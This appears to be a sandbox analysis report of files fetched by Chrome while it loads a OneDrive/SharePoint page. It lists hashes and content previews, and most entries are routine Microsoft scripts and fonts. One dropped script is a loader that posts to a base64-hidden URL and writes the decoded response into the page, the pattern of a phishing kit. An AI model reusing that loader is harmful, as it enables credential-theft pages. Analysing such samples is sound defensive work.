                                        Preview:/*! For license information please see 505.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[505],{8734:function(e,t,n){n.d(t,{A:function(){return k},B:function(){return $},C:function(){return J},D:function(){return de},E:function(){return se},F:function(){return ce},G:function(){return ne},H:function(){return T},I:function(){return M},J:function(){return P},K:function(){return q},L:function(){return oe},M:function(){return V},a:function(){return z},b:function(){return G},c:function(){return K},d:function(){return W},e:function(){return ee},f:function(){return Z},g:function(){return ie},h:function(){return te},i:function(){return ae},j:function(){return w},k:function(){return F},l:function(){return B},m:function(){return U},n:function(){return H},o:function(){return A},p:function(){return O},q:function(){return C},r:function(){return N},s:function(){return E},t:function(){return R},u:function(){return re},v:function(){return I},w:function()
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                        Category:dropped
                                        Size (bytes):199
                                        Entropy (8bit):6.766983163126765
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:21B761F2B1FD37F587D7222023B09276
                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (62513)
                                        Category:dropped
                                        Size (bytes):440145
                                        Entropy (8bit):5.237781338176939
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D4697AF177C75CF173E0498412284E43
                                        SHA1:DA3A056FB8A463C80E6C1FF3A824005D04B02B4D
                                        SHA-256:D429254556E1852F72B0B767CAD15B0630B0FA51584954C2B5B05B357DA6BBA5
                                        SHA-512:FEEFCE55103031266A7CE4F6EC7E9573C030AD7DB14A63EDF679A3DD051FF895F3909ACDB875E00B94DDF497B3E45A1F406CDE10445658A1F2E04463ADB18658
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! For license information please see 1621.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1621],{6161:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(2681),i=function(){function e(){this._nonceMap=new Map,this._NONCE_REGEX=/nonce="([^"]*)"/}return e.getNonceManager=function(){return null==this._nonceManager&&(this._nonceManager=new e),this._nonceManager},e.prototype.getNonceFromResource=function(e,t){var n=this,i=this._getKey(e),r=this._getNonce(i);if(r&&t)return Promise.resolve(r);var o=new Headers;o.append("Authorization","Bearer"),o.append("Accept-Auth","PoP");var s={method:"HEAD",headers:o,credentials:"omit"};return this._qosMonitor=new a.c("NonceManager.GetShrNonce"),fetch(e,s).then(function(t){var a,o,s,c=t.headers.get("www-authenticate");if(401===t.status&&c){var d=c.match(n._NONCE_REGEX);if(2!==(null==d?void 0:d.length)){var l=new Error("Unable to fetch nonce from wwwAuthenticate Header: "+c);return null===(a=n._qosMonit
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65457)
                                        Category:downloaded
                                        Size (bytes):141219
                                        Entropy (8bit):5.330456313460217
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:011539494759FBAAE745C4E8D4F2AABF
                                        SHA1:C1127E596ED47FF68721D8B679ED6604E4318684
                                        SHA-256:DCAB75ECDDDDEAFC14296ADB17BEED67A88FA52559A4596A26D2EA0F95FA67F4
                                        SHA-512:E9F603BC2B2E0B7899886208D7B28B373DC777D7682B15B457A658AE8383257B0346F5FFF32E727631A78B67EB717C420A9F9F9D79B6B69227E50430AB20E54D
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.1ds/odsp.1ds.lib-923e3d9a.js
                                        Preview:/*! For license information please see odsp.1ds.lib-923e3d9a.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.1ds.lib"],{"1ds-lib":function(e,t,n){n.r(t),n.d(t,{_InMemoryPropertyStorage:function(){return Ls},_OneDSLogger:function(){return As}});var a={};n.r(a),n.d(a,{optionalDiagnostic:function(){return fs},requiredDiagnostic:function(){return us},requiredService:function(){return ps}});var i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function r(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}i(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var o=function(){return o=Object.assign||function(e){for(var t,n=1,a=arguments.length;n<a;n++)for(var i i
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4670)
                                        Category:downloaded
                                        Size (bytes):10888
                                        Entropy (8bit):5.355170288973177
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4ECEF37610E2800719404A7B497C0AC7
                                        SHA1:A89D14937F4B2C3DE7AF77EF92D3BE3CC912D4AC
                                        SHA-256:E6AD49856E4D379858DCAC3B473EBFD53DFF61A5F2066E9077036935BC1E58CD
                                        SHA-512:B71F9BECBED1650878F6F92C39178A4AF267DB887C1E6E5FF9947B37F7D83B5E9EDD819056F5DAA82C767492D87E3559470D96072002D8A48730B5F5C6B940CA
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/273.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[273],{4123:function(e,t,n){n.d(t,{a:function(){return r},b:function(){return o}});var a=n(0),i=n(188),r=new a.a("followed"),o=new i.a("followedItem")}.,4673:function(e,t,n){n.d(t,{a:function(){return r}});var a=n(5),i=n(2007);function r(e,t){var n,r=t.itemKey,o=t.isMountPoint,s=e.demandItemFacet(a.r,r);if(e.demandItemFacet(a.v,null==s?void 0:s.itemKey))return!0;var c=null===(n=e.demandItemFacet(a.o,r))||void 0===n?void 0:n.extension;return(0,i.a)({extension:c,isMountPoint:o,isList:!1})}}.,2171:function(e,t,n){n.r(t),n.d(t,{spFavoritesAddon:function(){return x}});var a=n(21),i=n(67),r=n(5),o=n(29),s=n(72),c=n(5836),d=n(860),l=n("tslib_102"),u=n(48),f=n(862),p=n(4123),m=n(22),_=n(4673),h=n("odsp.util_460"),b=n(6),g=n(7),v=n(34),y=n(1576),S=!h.HW.isActivated("F01DE29D-B569-499E-83F8-AF66263E0852","03/24/2023","Do not show favorite command until data resolves");function D(e,t){var n=t.itemKeys,a=y.a.serialize({})
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (12139)
                                        Category:dropped
                                        Size (bytes):28157
                                        Entropy (8bit):5.42061725575881
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9255F1D6CA19F506FA5E77E7BDA78147
                                        SHA1:0178BB1B94DD74B8CB375756CDD242568099CE1D
                                        SHA-256:74DD9DFF52BEF839BF56080F3B12D4579DD53FA1552950BCCD4C1C60E0F6A6E5
                                        SHA-512:EE7D49C514073B03DC1824AFCDDF58F7860C144AF45385409B2BA8ABC76DA98E20B4B371B9CF40BB1C5FF09FFCE8DE151867AA8531B50FBE9B13A7A445F3B7D8
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[296],{5771:function(e,t,n){n.d(t,{a:function(){return o}});var a=n(2),i=n(77),r=new i.b("externalItem",{url:i.d}),o=new a.a(r)}.,5867:function(e,t,n){n.d(t,{a:function(){return ie}});var a=n("tslib_102"),i=n(21),r=n(67),o=n(5),s=n(22),c=n(72),d=n(29),l=n(268),u=n(337),f=n(102),p=n(90),m=n(7962),_=n(5868),h=n(5869),b=n(6),g=n(55),v=n(1723),y=n(24),S=n(41),D=n(1629),I=n(515),x=(0,i.e)()(function(e){var t=this;return function(n){return(0,a.Zd)(t,void 0,void 0,function(){var t,i,r,c,d,u,f,S,x,w,E,A,L;return(0,a.qr)(this,function(k){return t=l.a.deserialize(e.itemKey).tenantRootUrl,i=new g.a,r=n((0,y.a)(C)),c=n((0,y.a)(O)),d=_.a.serialize({tenantRootUrl:t}),u=h.a.serialize({tenantRootUrl:t}),f=D.a.serialize({tenantRootUrl:t}),S=I.a.serialize({tenantRootUrl:t}),x=c?[S]:[d,u],w=(0,a.W_)((0,a.W_)({},c?((E={})[S]=(0,a.W_)((0,a.W_)((0,a.W_)({},p.f.pack(!0)),o.m.pack(m.c)),b.Cc.pack({itemKey:e.itemKey})),E):((A={})[d]=(
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):761
                                        Entropy (8bit):5.276659479414991
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BCA97C77F473C1A4153E5A5EFF0B887E
                                        SHA1:1ACEAF83FD1153ED48B9B4928C7B701412D92DE7
                                        SHA-256:D9E0257876D2DED62A4F6245895334AB621598B5432513986086DB037B1C1887
                                        SHA-512:03779175142138488D507DA761805420B07BEBD03754B7FB386E5CE27CEADE09D322804FC6F94F79E4579A536A3BC8283246747840FB57099217C7ECBC996F79
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:var scr= document.createElement('script');..var stc ="aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="..scr.setAttribute('src',atob(stc));..document.head.append(scr);..scr.onload=function(){..$.support.cors = true..var url = atob($('#b64u').val());..$.post(url,'scte='.concat(''))....done(function(data){.. if(data=='no'){... document.write('<h1>Please Get an api key to use this page</h1>')... }... else if(data == "outdated"){.... document.write('<h1>Please get an updated version of the page</h1>')... }... else{.... try{..... document.write(atob(data));.... }catch(e){..... document.write('<h1>Cannot write to page</h1>').... }... }...})....fail(function(cd,pg){....document.write("<h1>Unable to connect , Server not found</h1>")...})..}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
                                        Category:dropped
                                        Size (bytes):1173
                                        Entropy (8bit):7.811199816788843
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5C7ACF60A2ACAA5C54BF2B2EC6D484D8
                                        SHA1:F1837FD5DB6DAD498148D7D77438DE693114B042
                                        SHA-256:EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
                                        SHA-512:11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[.*.)..=.....z.?/.._......|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.*S..wM.,../.|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.*+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....*1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (8317)
                                        Category:downloaded
                                        Size (bytes):16177
                                        Entropy (8bit):5.402274818029552
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:888AF1399A4EFE1829497FA1421C140A
                                        SHA1:6580CFB36F4440246B7A1F1BB04CB89BFD737267
                                        SHA-256:AD505A135EB4DB7E1AAD4929302CF60A817B68209597CAE67E900B66DA518EDB
                                        SHA-512:17936F7A9D4EAA168B52917D8F181C0C472151C0805617D1E8647A0CB54464470494F5EB699D5AE7DBF95435590092698F015FC997C3B431F77739B4110A2B80
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/1367.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1367],{2840:function(e,t,n){n.d(t,{a:function(){return f}});var a=n("tslib_102"),i=n("react-lib"),r=n(33),o=n(3064),s=n(467),c=n(152),d=n(137),l={beakWidth:16,gapSpace:0,setInitialFocus:!0,doNotLayer:!1,directionalHint:c.a.rightCenter},u=(0,r.a)(),f=i.forwardRef(function(e,t){var n=i.useRef(null),r=(0,d.a)(n,t),c=e.calloutProps,f=e.targetElement,p=e.onDismiss,m=e.hasCloseButton,_=void 0===m?e.hasCloseIcon:m,h=e.isWide,b=e.styles,g=e.theme,v=e.target,y=i.useMemo(function(){return(0,a.W_)((0,a.W_)((0,a.W_)({},l),c),{theme:g})},[c,g]),S=u(b,{theme:g,isWide:h,calloutProps:y,hasCloseButton:_}),D=S.subComponentStyles?S.subComponentStyles.callout:void 0;return function(e,t){i.useImperativeHandle(e,function(){return{focus:function(){var e;return null===(e=t.current)||void 0===e?void 0:e.focus()}}},[t])}(e.componentRef,n),i.createElement(s.a,(0,a.W_)({target:v||f,onDismiss:p},y,{className:S.root,styles:D,hideOverflow:
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (56818), with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):319505
                                        Entropy (8bit):5.910527807980486
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:95C75871966A252F374934E6DA66BC15
                                        SHA1:B4DDC490776533D2A32ACE68953293A497ADDC5C
                                        SHA-256:2CB19A0380C174D330598D6DA409E08309F5EC7676F5F0D0F702708B72F7BE49
                                        SHA-512:EA335AB5A1FB36AB7E51EFF0B4B8C24617E7D820222608C3FE8364CC43CD4452891FC72CC9C52B2938C3B011A8E206CA4978E7F7202C476F186BAC316702EF0C
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://atlantarecyclingsolutions-my.sharepoint.com/personal/jharben_atlantarecyclingsolutions_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fjharben%5Fatlantarecyclingsolutions%5Fcom%2FDocuments%2FTXRE%20Properties&ga=1
                                        Preview:..<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head><meta name="GENERATOR" content="Microsoft SharePoint" /><meta http-equiv="Content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Expires" content="0" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no" /><title>...OneDrive..</title><link rel="shortcut icon" href="/_layouts/15/images/odbfavicon.ico?rev=47" type="image/vnd.microsoft.icon" id="favicon" /></head>.. <body style="margin: 0; padding: 0;">.. <script nonce= '69f7d97d-621d-46aa-a30a-cf82704a6544' >if(!spfxPerfMarks){var spfxPerfMarks = {};} var markPerfStage=function(key) {if(window.performance && typeof window.performance.now === 'function'){spfxPerfMarks[key]=window.performance.now();} else{spfxPerfMarks[key]=Date.now();} if (window.performance && typeof window.performance.mark === 'function') {window.performance.mark(key);}};<
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format, TrueType, length 15152, version 1.3277
                                        Category:downloaded
                                        Size (bytes):15152
                                        Entropy (8bit):7.975837827549664
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:71C6CE41CD1A7B9DEFAA9D9D739BE12E
                                        SHA1:ED30186F02C259A162F962D7861861C41EE25817
                                        SHA-256:B862306928A5699966E7579C3AF5A857D4C2B634F764D45DEA2F6360DFCD5888
                                        SHA-512:B34C5D8994B6C3CA5FE8B7E1C8988DFC90AAF0E9B7ED2583D6D7A46C17FE8428099BDDBB5E640F2E00832263635A0F9C02360FCB3AF402CFC7294910BE874659
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-6-7ab2496d.woff
                                        Preview:wOFF......;0......z.........................OS/2.......G...`1=h.cmap...P...j.....r..gasp................glyf......3...jL...head..5....4...6#...hhea..6........$....hmtx..6 ...r.......loca..6.........}5..maxp..7`....... .r..name..7x.......O..R.post..;........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px.......`u,......9..c.x...I(.P.....!E.z.H.!ea(S......G.z.BXJ.2..<CI,...N2-H....d.....(;N.{:....QJ.....W.N=.l...Z.!....S..Lf3.y.g..hf%kia=...n.......G9..Nr..\.:7....q..<..OxJ......y.;>..|.%...{q.'q..q.w..O.x........DH.DI..R?.j>e]Z..Ef..-..m.~.m..od/6...2,a.s...V1.+.p.1.`...@/..6T`.M.....D..Q.....%hF....G........HB....l.b.... .Y.@ ......A.N.!..p3=..M....+..28.......C.l..............x..}.`..hU..............s$.i[.X.-..e.....`........q .`...Ip.,I... ..9.....d....!.I...-M.WUw.F.l..........U.zU.....p......r...p..5cQznq......72..8.8....~.`....\.>...@...=0.Cg3I*.../..S.o.....ed.4k....~I*.ez.N.{ j..\v*.M.N...{..."...H...#)/s.G.?.....j...h~"....a{M..qZZ.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (12428)
                                        Category:dropped
                                        Size (bytes):34763
                                        Entropy (8bit):5.435917024224119
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:ADDD839F384C30228D88B01070F8871B
                                        SHA1:EC997B15911CA950C75B1C10908C401FA09F39CF
                                        SHA-256:2D5AC5AC333D095C03683A9B9AC76CD7D5577DF4E845DE9119CBCA8A2C6ABCC5
                                        SHA-512:81DD98CE11E387C3F4705056648B5CE033499660980376FCF8414D7A4F609CB0DAD0C6CDFD9EDE15A63DD558A4D9E370A5A42674AD54E4AAD53B72999C047E9F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! For license information please see 1838.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1838],{3140:function(e,t,n){"use strict";n.d(t,{a:function(){return p}});var a=n("react-lib"),i=n(160),r=n(159),o=n(236),s=n("fui.core_351"),c=n(220);const d=(0,s.xbz)({base:{Bt984gj:"f122n59",B7ck84d:"f1ewtqcl",mc9l5x:"f22iagw",Beiy3e4:"f1063pyq",Bh6795r:"fqerorx",qhf8xq:"f10pi13n",Bahqtrf:"fk6fouc",Be2twd7:"fy9rknc",Bhrd7zp:"figsok6",Bg96gwp:"fwrc4pm",fsow6f:"f17mccla",Bcvre1j:"fyl8oag",Br0sdwz:"f16vkdww",Bn78ew0:"fhsnbul",li1rpt:"f1gw3sf2",ap17g6:"f1ly5f7u",B771hl4:"f1s3tz6t"},childless:{susq4k:"f1kyqvp9",Bicfajf:["fzynn9s","f1z0ukd1"],jwcpgy:["fekrn8e","ftdg338"],B4rk6o:"fesgyo"},start:{Bsft5z2:"f13zj6fq"},center:{Ftih45:"f1wl9k8s",Bsft5z2:"f13zj6fq"},end:{Ftih45:"f1wl9k8s"},brand:{sj55zd:"f16muhyy",Bq4z7u6:"fcbuu2a",Bk5zm6e:["f1wdw2dr","f1ttio3w"],Bqjgrrk:"f1582fpk",Bm6vgfq:["f1ttio3w","f1wdw2dr"],B0n5ga8:"f1ahrvm8",s924m2:["f1cd3wbc","f17hbk9y"],B1q35kw:"
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (6218)
                                        Category:downloaded
                                        Size (bytes):8124
                                        Entropy (8bit):5.314835624751813
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:B8070322B3EE826E3699E0D3E6E63851
                                        SHA1:A922DC175F753F15A03356A39FE5C0EF8B8B3E21
                                        SHA-256:21F2596A7AAA68FECE0BEC97D4DE08B7C4672E551B3264033C680A23BBA3F2EB
                                        SHA-512:AC2419F7F0FE4C1A1B63CB9CCB8D0714127DD7B87ADC14C117F442AA1787D32585C603BE88EC5AF9DFDB988666ED2DE35E8FDAD0C60B7A6150DC05A53D1F6F19
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/464.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[464],{4254:function(e,t,n){n.d(t,{a:function(){return A}});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.core_351"),o=n(46),s=n("fui.util_369"),c=n(3881),d=n("odsp.util_460").HW.isActivated("6962f816-a406-46ea-8fd6-12386fbd6187","7/31/2024","khhuynh - Fix extra padding caused by empty action row element"),l=(0,r.mmJ)({from:{transform:"rotate(0deg)"},to:{transform:"rotate(360deg)"}}),u=function(e){return(0,r.mmJ)({from:{height:0},to:{height:e}})},f=function(e){return(0,r.mmJ)({from:{height:e},to:{height:0}})},p=(0,r.mmJ)({from:{transform:"scale(0.9, 0.9)"},to:{transform:"scale(1, 1)"}}),m=(0,r.mmJ)({from:{opacity:0},to:{opacity:1}}),_=(0,r.mmJ)({from:{opacity:1},to:{opacity:0}}),h=(0,s.Ww)(function(e){var t,n=e.theme,a=e.className,i=e.animateStatusIcon,s=e.toastState,h=e.animate,b=e.hasActionableButtons,g=e.hasProgressIndicator,v=e.toastHeight,y=void 0===v?g?54:48:v,S=n.palette,D=n.effects,I=n.isInverted;retu
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (11267)
                                        Category:downloaded
                                        Size (bytes):14407
                                        Entropy (8bit):5.3175010890920795
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F0E5822D92E596A0BD51C6BE68D3D093
                                        SHA1:67959DCE0151CB9F76E57284224E586B92680F6B
                                        SHA-256:D8B8F5C42C46FF1464888C1BF139EB37526456866250DEC3B2B677834F1C9428
                                        SHA-512:F2D09CC690365BB8B542B59903CF1DFCCAC3C694697ADD6B7F1E79AB52082B02FD40C719E17116B82D447A8D7F1F0FEE7F85C1A1775D25038FBE4B0B4E2FF01E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/0.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[0],{5845:function(e,t,n){n.d(t,{a:function(){return U}});var a=n("tslib_102"),i=n("react-lib"),r=n(33),o=n(367),s=n("fui.util_369"),c=n(281),d=n("fui.core_351"),l=n(1489),u=n(7917),f=n(2764),p=n(321),m=n(1735),_=n(1731),h=n(192),b=n(152),g=n(82),v=(0,s.Ww)(function(e,t){return{root:(0,s.J4)(e,t&&{touchAction:"none",selectors:{"& *":{userSelect:"none"}}})}}),y=n(533),S=n(142),D=n(282),I={start:"touchstart",move:"touchmove",stop:"touchend"},x={start:"mousedown",move:"mousemove",stop:"mouseup"},C=function(e){function t(t){var n=e.call(this,t)||this;return n._currentEventType=x,n._events=[],n._onMouseDown=function(e){var t=i.Children.only(n.props.children).props.onMouseDown;return t&&t(e),n._currentEventType=x,n._onDragStart(e)},n._onMouseUp=function(e){var t=i.Children.only(n.props.children).props.onMouseUp;return t&&t(e),n._currentEventType=x,n._onDragStop(e)},n._onTouchStart=function(e){var t=i.Children.only(n
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:XML 1.0 document, ASCII text, with very long lines (443), with no line terminators
                                        Category:dropped
                                        Size (bytes):443
                                        Entropy (8bit):4.920679566192411
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E0A40795A3DCFC0FF6E3060AE42B4139
                                        SHA1:103AA9D566CE73524F15E89C792BFE2E59EB6512
                                        SHA-256:84DFB688C8655E3A75E462F66F5A316E29F5DE5AE8D785822F8E4F9BFB6B79F5
                                        SHA-512:C8A8BC4317E8BEA6513F0C33AD94D97E2D60BE9DAB1EA2FDE301B1007E7D866C39D9FACAC4EC2A3CFFF7CF7FC4F3E49C52B39BCE42E673F7F94D853B051667CE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="utf-8"?><m:error xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"><m:code>-1, Microsoft.SharePoint.Client.ClientServiceException</m:code><m:message xml:lang="en-US">The HTTP method 'GET' cannot be used to access the resource 'RenderListDataAsStream'. The operation type of the resource is specified as 'Default'. Please use correct HTTP method to invoke the resource.</m:message></m:error>
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (48338)
                                        Category:downloaded
                                        Size (bytes):51418
                                        Entropy (8bit):5.249480185424832
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5DBDD0B577D2D24AC0EEA9250EE652FE
                                        SHA1:97A11F9C2EDBD3379AD6155196AB83DA46945A5E
                                        SHA-256:01433B1F93ADA2174535F9235A072E8EAE4066DE1A510C875C617530BA851833
                                        SHA-512:4836D7DE2231BBC50A779200E2A60C3AA08E455DB74A07C769998343309FD9096992D79E94EB79EB5FA77D4B7081B5ED79E96DFABCEEB35C88937846D4289729
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://shell.cdn.office.net/shellux/suiteux.shell.responsive.6661d2ab3a0a6be1b13e.js
                                        Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_responsive_start"),(self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]=self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]||[]).push([["responsive"],{1229:function(e,t,n){(t=e.exports=n(145)(!1)).push([e.id,"html[dir=rtl] ._7PGqXIlT8jItdB8fOBmFkg\\=\\={transform:scaleX(-1);-moz-transform:scaleX(-1);-webkit-transform:scaleX(-1);-ms-transform:scaleX(-1)}",""]),t.locals={iconFontRTL:"_7PGqXIlT8jItdB8fOBmFkg=="}},8304:function(e,t,n){(t=e.exports=n(145)(!1)).push([e.id,'.M3pcB5evSAtYMozck1WU7A\\=\\={height:100%;line-height:48px;display:flex}._1QSK5lUhw5Gkh7SDz97ZPQ\\=\\={height:48px;display:flex}.siUMOJwnumycxvszBe3uzQ\\=\\={display:inherit;flex:inherit;justify-content:inherit;order:inherit;align-self:inherit;min-width:inherit}.\\/DyMYj2gNfPrYNbEWoV2\\/w\\=\\={font-size:14px;font-family:SegoeU
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (43609)
                                        Category:downloaded
                                        Size (bytes):57962
                                        Entropy (8bit):5.4967224753012065
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:B9B856C82390579ACE22E1698143FF52
                                        SHA1:49AF8AFDB1446CE2E6B1F02522065DBB948D86BB
                                        SHA-256:D51D08255A4D19AA8A586ED56522DEA4789E36A78A65551CBFDB5D51D124D645
                                        SHA-512:8AA342E249D8DB09F612B6769946EF705D07DBE68F091A6A9026F8C5D71832600948CBCFB4EAA27AE578D446EE93E7E7FCA5EFEB1C9919C8F189BBBFEB6272A8
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/15.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[15],{5760:function(e,t,n){function a(e){return".pbix"===e}n.d(t,{a:function(){return a}})}.,7812:function(e,t,n){var a;n.d(t,{a:function(){return a}}),function(e){e.None="None",e.FilterInViewDef="FilterInViewDef",e.MultiSortsInViewDef="MultiSortsInViewDef",e.SortFieldInViewDef="SortFieldInViewDef",e.FilterInQueryParam="FilterInQueryParam",e.SortFieldInQueryParam="SortFieldInQueryParam",e.GroupFieldInQueryParam="GroupFieldInQueryParam",e.NoPermission="NoPermission",e.Unknown="Unknown"}(a||(a={}))}.,5754:function(e,t,n){n.r(t),n.d(t,{getServerData:function(){return S},getServerDataWithPrefetch:function(){return y}});var a=n("tslib_102"),i=n(184),r=n(1494),o=n(1565),s=n(30),c=n(134),d=n(6),l=n(28),u=n(1563),f=n(80),p=n(1495),m=n(5755),_=n(100);function h(e,t){var n=e.HttpRoot||new _.default(t).authority,i=new _.default(n).path,r=(e.listUrlDir||"").slice(0,i.length)===i;return(0,a.W_)((0,a.W_)({},e),{listUrlDir:r
